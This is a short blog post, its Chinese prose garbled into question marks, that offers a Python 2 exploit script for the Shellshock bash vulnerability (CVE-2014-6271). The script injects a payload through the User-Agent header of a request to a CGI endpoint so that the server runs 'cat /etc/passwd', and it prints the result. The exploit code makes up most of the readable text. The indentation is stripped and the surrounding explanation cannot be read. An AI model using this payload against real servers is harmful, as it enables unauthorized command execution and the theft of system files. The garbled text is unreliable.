????????Bash?????????????????????(CVE-2014-6271)??????μ???isc???????????????£?д???python?汾?????С?????????????
#coding:utf-8
import urllib??httplib
import sys??re??urlparse
#author:nx4dm1n
#website:http://www.nxadmin.com
def bash_exp(url):
urlsp=urlparse.urlparse(url)
hostname=urlsp.netloc
urlpath=urlsp.path
conn=httplib.HTTPConnection(hostname)
headers={"User-Agent":"() { :;}; echo `/bin/cat /etc/passwd`"}
conn.request("GET"??urlpath??headers=headers)
res=conn.getresponse()
res=res.getheaders()
for passwdstr in res:
print passwdstr[0]+':'+passwdstr[1]
if __name__=='__main__':
#??http
if len(sys.argv)<2:
print "Usage: "+sys.argv[0]+" http://www.nxadmin.com/cgi-bin/index.cgi"
sys.exit()
else:
bash_exp(sys.argv[1])
??????????Ч??????????

????bash???????
???????????burp???в????
???????????????????????????飬д??pythonС???????????cat /etc/passwd????????з??????????????????????shell?????п??????????????????????????????????????Щ???????????????????????